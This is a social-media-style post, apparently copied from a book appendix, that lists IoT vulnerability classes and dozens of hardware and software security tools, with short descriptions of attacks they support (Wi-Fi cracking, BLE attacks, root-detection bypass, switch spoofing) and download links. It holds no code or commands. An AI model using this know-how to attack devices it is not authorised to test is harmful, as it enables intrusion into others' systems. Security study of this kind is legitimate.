IOT HACKING

IOT HACKING

⭕🔱🇰‌🇦‌🇱‌🇮™🔱⭕

IoT hacking can be extremely effective, producing DDoS attacks that can cripple our infrastructure, systems, and way of life. We've all heard of cybersecurity concerns when it comes to IoT devices and there's an inherent risk that comes with connecting more and more devices to the internet and to each other.

@its_me_kali

For video tutorial click on apple:

🍎🍏🍎🍏🍎🍏🍎

IoT Vulnerabilities

  • Weak, Guessable, or Hardcoded Passwords. ...
  • Insecure Network Services. ...
  • Insecure Ecosystem Interfaces. ...
  • Lack of Secure Update Mechanism. .
  • Insufficient Privacy Protection. ...
  • Insecure Data Transfer and Storage.
  • Lack of Device Management.

🍎Top IOT Hacking Tools:

🍏Adafruit FT232H Breakout

Adafruit FT232H Breakout is probably the smallest and cheapest device for interfacing with I2C, SPI, JTAG, and UART. The main downside to it is that the headers don’t come pre-soldered. It’s based on FT232H, which is the chip that Attify Badge, the Shikra, and Bus Blaster use (although the Bus Blaster uses the dual channel version, FT2232H). You can get it at https://www.adafruit.com/product/2264

🍏Aircrack-ng

Aircrack-ng is an open source suite of command line tools for Wi-Fi security testing. It supports packet capturing, replay attacks, and deauthentication attacks, as well as WEP and WPA PSK cracking. We use various programs from the Aircrack-ng tool . You can find all the tools at https://www.aircrack-ng.org/

🍏Alfa Atheros AWUS036NHA 

Alfa Atheros AWUS036NHA is a wireless (802.11 b/g/n) USB adapter that we use for Wi-Fi attacks. Atheros chipsets are known for supporting AP monitor mode and having packet injection capabilities, both of which are necessary for conducting most Wi-Fi attacks. You can learn more about it at https://www.alfa.com.tw/products_detail/7.htm

🍏Android Debug Bridge

Android Debug Bridge (adb) is a command line tool for communicating with Android devices. We used it extensively to interact with vulnerable Android apps. Learn all about it at https://developer.android.com/studio/command-line/adb

🍏Arduino

Arduino is an inexpensive, easy-to-use, open source electronics platform that lets you program microcontrollers using the Arduino programming language. We used Arduino to code a vulnerable program for the black pill microcontroller. Arduino UNO as the controller on an I2C bus. We used Arduino to program the Heltec LoRa 32 development board as a LoRa sender. Arduino’s website is at https://www.arduino.cc/

🍏Attify Badge

Attify Badge is a hardware tool that can communicate with UART, 1-WIRE, JTAG, SPI, and I2C. It supports 3.3V and 5V currents. It’s based on the FT232H, the chip used in the Adafruit FT232H Breakout, the Shikra, and Bus Blaster (although Bus Blaster uses the dual channel version, FT2232H). You can find the badge with pre-soldered headers at https://www.attify-store.com/products/attify-badge-uart-jtag-spi-i2c-pre-soldered-headers


🍏Beagle I2C/SPI Protocol Analyzer

The Beagle I2C/SPI Protocol Analyzer is a hardware tool for high performance monitoring of I2C and SPI buses. You can buy it at https://www.totalphase.com/products/beagle-i2cspi/

🍏Bettercap

Bettercap is an open source multi-tool written in Go. You can use it to perform reconnaissance for Wi-Fi, BLE, and wireless HID devices, as well as Ethernet man-in-the-middle attacks. We used it for BLE hacking .Download it at https://www.bettercap.org/

🍏BinaryCookieReader

BinaryCookieReader is a tool for decoding binary cookies from iOS .

Find it at https://github.com/as0ler/BinaryCookieReader/

🍏Binwalk

Binwalk is a tool for analyzing and extracting firmware. It can identify files and code embedded in firmware images using custom signatures for files commonly found in those images (such as archives, headers, bootloaders, Linux kernels, and filesystems). We used Binwalk to analyze the firmware of a Netgear D600 router and to extract the filesystem of an IP webcam’s firmware.You can download it at https://github.com/ReFirmLabs/binwalk/

🍏BladeRF

BladeRF is an SDR platform, similar to HackRF One, LimeSDR, and USRP. There are two versions of it. The newer and more expensive bladeRF 2.0 micro supports a wider frequency range of 47 MHz to 6 GHz. You can learn more about bladeRF products at https://www.nuand.com/

🍏Burp Suite

Burp Suite is the standard tool used for the security testing of web applications. It includes a proxy server, web vulnerability scanner, spider, and other advanced features, all of which you can expand with Burp extensions. You can download the Community Edition free of charge from https://portswigger.net/burp/

🍏Bus Blaster

Bus Blaster is a high-speed JTAG debugger compatible with OpenOCD. It’s based on the dual-channel FT2232H chip. We used Bus Blaster in to interface with JTAG on an STM32F103 target device. Download it from http://dangerousprototypes.com/docs/Bus_Blaster.

🍏Bus Pirate

Bus Pirate is an open source multi-tool for programming, analyzing, and debugging microcontrollers. It supports bus modes, such as bitbang, SPI, I2C, UART, 1-Wire, raw-wire, and even JTAG with special firmware. You can find more about it at http://dangerousprototypes.com/docs/Bus_Pirate.

🍏CatWAN USB Stick

CatWAN USB Stick is an open source USB stick designed as a LoRa/LoRaWAN transceiver. We use it as a sniffer to capture LoRa traffic between the Heltec LoRa 32 and the LoStik. You can buy it at https://electroniccats.com/store/catwan-usb-stick/

🍏ChipWhisperer

The ChipWhisperer project is a tool for conducting side channel power analysis and glitching attacks against hardware targets. It includes open source hardware, firmware, and software and has a variety of boards and example target devices for practicing. You can buy it at https://www.newae.com/chipwhisperer/

🍏CircuitPython

CircuitPython is an easy, open source language based on MicroPython, a version of Python optimized to run on microcontrollers. We used CircuitPython to program the CatWAN USB stick as a LoRa sniffer. Its website is at https://circuitpython.org/

🍏Clutch

Clutch is a tool for decrypting IPAs from an iOS device’s memory. We briefly mentioned it in . Get it at https://github.com/KJCracks/Clutch/

🍏CubicSDR

CubicSDR is a cross-platform SDR application. We use it to convert the radio spectrum into a digital stream that we could analyze. You can find it at https://github.com/cjcliffe/CubicSDR/


🍏Dex2jar

Dex2jar is a tool for converting DEX files, which are part of an Android Package, to JAR files, which are more readable. We use it to decompile an APK. You can download it at https://github.com/pxb1988/dex2jar/


🍏DROZER

Drozer is a security testing framework for Android. We used it to perform dynamic analysis on a vulnerable Android app. You can get it at https://github.com/FSecureLABS/drozer/.

🍏FIRMADYNE

FIRMADYNE is a tool for emulating and dynamically analyzing Linux-based embedded firmware. We use FIRMADYNE to emulate the firmware of a Netgear D600 router. You can find the source code and documentation for FIRMADYNE at https://github.com/firmadyne/firmadyne/.

🍏Firmware Analysis and Comparison Tool (FACT)

FACT is a tool for automating the firmware analysis process by unpacking firmware files and, among other things, searching for sensitive information such as credentials, cryptographic material, and more. You can find it at https://github.com/fkie-cad/FACT_core/.

🍏Frida

Frida is a dynamic binary instrumentation framework used for analyzing running processes and generating dynamic hooks. We use it to avoid jailbreak detection in an iOS app and to avoid root detection in an Android app. We also use it to hack the buttons that controlled a smart treadmill. You can learn all about it at https://frida.re/

FTDI FT232RL

FTDI FT232RL is a USB-to-serial UART adapter. We use it to interface with the UART ports on the black pill microcontroller. We used the one at https://www.amazon.com/Adapter-Serial-Converter-Development-Projects/dp/B075N82CDL/, but there are cheaper alternatives, too.

🍏GATTTool 

Generic Attribute Profile Tool (GATTTool) is used for discovering, reading, and writing BLE attributes. We use it to demonstrate various BLE attacks. GATTTool is part of BlueZ, which you’ll find at http://www.bluez.org/

🍏GDB

The GDB is a portable, mature, feature-complete debugger that supports a wide array of programming languages. We used it in OpenOCD to exploit a device through SWD. You can find more about it at https://www.gnu.org/software/gdb/

Ghidra

Ghidra is a free and open source reverse-engineering tool developed by the National Security Agency (NSA). It’s often compared with IDA Pro, which is closed source and costly but has features that Ghidra doesn’t. Download Ghidra at https://github.com/NationalSecurityAgency/ghidra/

🍏HackRF One

HackRF One is a popular, open source SDR hardware platform. It supports radio signals from 1 MHz to 6 GHz. You can use it as a stand-alone tool or as a USB 2.0 peripheral. Similar tools include bladeRF, LimeSDR, and USRP. HackRF supports only half-duplex communication, whereas the other tools support full-duplex communication. You can learn more about it from Great Scott Gadgets at https://greatscottgadgets.com/hackrf/one/

🍏Hashcat

Hashcat is a fast password recovery tool that can leverage CPUs and GPUs to accelerate its cracking speed. We use it to recover a WPA2 PSK. Its website is at https://hashcat.net/hashcat/

🍏Hcxdumptool

Hcxdumptool is a tool for capturing packets from wireless devices. We use it to capture Wi-Fi traffic, which we then analyzed to crack a WPA2 PSK using the PMKID attack. Get it from https://github.com/ZerBea/hcxdumptool/

🍏Hcxtools

Hcxtools is a suite of tools for converting packets from captures to formats compatible with tools like Hashcat or John the Ripper for cracking. We use it to crack a WPA2 PSK using the PMKID attack. Get it from https://github.com/ZerBea/hcxtools/

🍏Heltec LoRa 32

Heltec LoRa 32 is a low-cost ESP32-based development board for LoRa. We use it to send LoRa radio traffic. You can get it at https://heltec.org/project/wifi-lora-32/

🍏Hydrabus

Hydrabus is another open source hardware tool that supports modes such as raw-wire, I2C, SPI, JTAG, CAN, PIN, NAND Flash, and SMARTCARD. It is used for debugging, analyzing, and attacking devices over the supported protocols. You’ll find Hydrabus at https://hydrabus.com/

🍏IDA Pro

IDA Pro is the most popular disassembler for binary analysis and reverse engineering. The commercial version is at http://www.hex-rays.com/, and a freeware version is available at http://www.hex-rays.com/products/ida/support/download_freeware.shtml. For a free and open source alternative to IDA Pro, take a look at Ghidra.

🍏JADX

JADX is a DEX to Java decompiler. It lets you easily view Java source code from Android DEX and APK files. . You can download it at https://github.com/skylot/jadx/

🍏JTAGulator

JTAGulator is an open source hardware tool that assists in identifying on-chip debugging (OCD) interfaces from test points, vias, or component pads on a target device. You can find more information about how to use and purchase JTAGulator at http://www.jtagulator.com/

🍏John the Ripper

John the Ripper is the most popular free and open source cross-platform password cracker. It supports dictionary attacks and a brute-force mode against a wide variety of encrypted password formats. We use it often to crack Unix shadow hashes in IoT devices.Its website is at https://www.openwall.com/john/

🍏LimeSDR

LimeSDR is a low-cost, open source SDR platform that integrates with Snappy Ubuntu Core, allowing you to download and use existing LimeSDR apps. Its frequency range is 100 kHz to 3.8 GHz. You can get it at https://www.crowdsupply.com/lime-micro/limesdr/

🍏LLDB

LLDB is a modern, open source debugger and is part of the LLVM project. It specializes in debugging C, Objective-C, and C++ programs. We use it to exploit the iGoat mobile app. Find it at https://lldb.llvm.org/.

🍏LoStik

LoStik is an open source USB LoRa device. We use it as the receiver of LoRa radio traffic. You can get it at https://ronoth.com/lostik/

🍏Miranda

Miranda is a tool for attacking UPnP devices. We used Miranda in to punch a hole through the firewall of a vulnerable UPnP-enabled OpenWrt router. Miranda resides at https://code.google.com/archive/p/mirandaupnptool/

🍏Mobile Security Framework (MobSF)

MobSF is a tool for performing both static and dynamic analysis of mobile app binaries. Get it at https://github.com/MobSF/Mobile-Security-Framework-MobSF/

🍏Ncrack

Ncrack is a high-speed network authentication cracking tool developed under the Nmap suite of tools. Ncrack is hosted at https://nmap.org/ncrack/

🍏Nmap 

Nmap is probably the most popular free and open source tool for network discovery and security auditing. The Nmap suite includes Zenmap (a GUI for Nmap), Ncat (a network debugging tool and modern implementation of netcat), Nping (a packet generation tool, similar to Hping), Ndiff (for comparing scan results), the Nmap Scripting Engine (NSE; for extending Nmap with Lua scripts), Npcap (a packet sniffing library based on WinPcap/Libpcap), and Ncrack (a network authentication cracking tool). You’ll find the Nmap suite of tools at https://nmap.org/

🍏OpenOCD

OpenOCD is a free and open source tool for debugging ARM, MIPS, and RISC-V systems through JTAG and SWD. We use OpenOCD to interface with our target device (the black pill) through SWD and exploit it with the help of GDB. You can learn more about it at http://openocd.org/

🍏Otool

Otool is the object-file-displaying tool for macOS environments. It’s part of the Xcode package, which you can access at https://developer.apple.com/downloads/index.action.

🍏OWASP Zed Attack Proxy

OWASP Zed Attack Proxy (ZAP) is an open source, web application security scanner that the OWASP community maintains. It’s a completely free alternative to Burp Suite, although it doesn’t have the same number of advanced features. You can find it at https://www.zaproxy.org/

🍏Pholus

Pholus is an mDNS and DNS-SD security assessment tool, Download it from https://github.com/aatlasis/Pholus

🍏Qark

Qark is a tool designed to scan Android applications for vulnerabilities. Download it from https://github.com/linkedin/qark/

🍏QEMU

QEMU is an open source emulator for hardware virtualization, featuring full system and user mode emulation. In IoT hacking, it’s useful for emulating firmware binaries. Firmware analysis tools, such as FIRMADYNE, torely on QEMU. Its website is at https://www.qemu.org/

🍏Shikra

Shikra is a hardware hacking tool that claims to overcome the shortcomings of Bus Pirate, allowing not only debugging, but also attacks such as bit banging or fuzzing. It supports JTAG, UART, SPI, I2C, and GPIO. It’s based on FT232H, the chip used in Attify Badge, Adafruit FT232H Breakout, and Bus Blaster (Bus Blaster uses the dual channel version FT2232H). You can get it at https://int3.cc/products/the-shikra/

🍏VoIP Hopper

VoIP Hopper is an open source tool for conducting VLAN hopping security tests. VoIP Hopper can imitate the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. We use it to imitate Cisco’s CDP protocol. You can download it at http://voiphopper.sourceforge.net/.

🍏Wireshark

Wireshark is an open source network packet analyzer and the most popular free tool for packet capturing. You can download it from https://www.wireshark.org/

🍏Yersinia

Yersinia is an open source tool for performing Layer 2 attacks. We used Yersinia to send DTP packets and conduct a switch spoofing attack. You can find it at https://github.com/tomac/yersinia/


Thankyou, This post is for educational purpose !

🦁By Its_me_kali


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org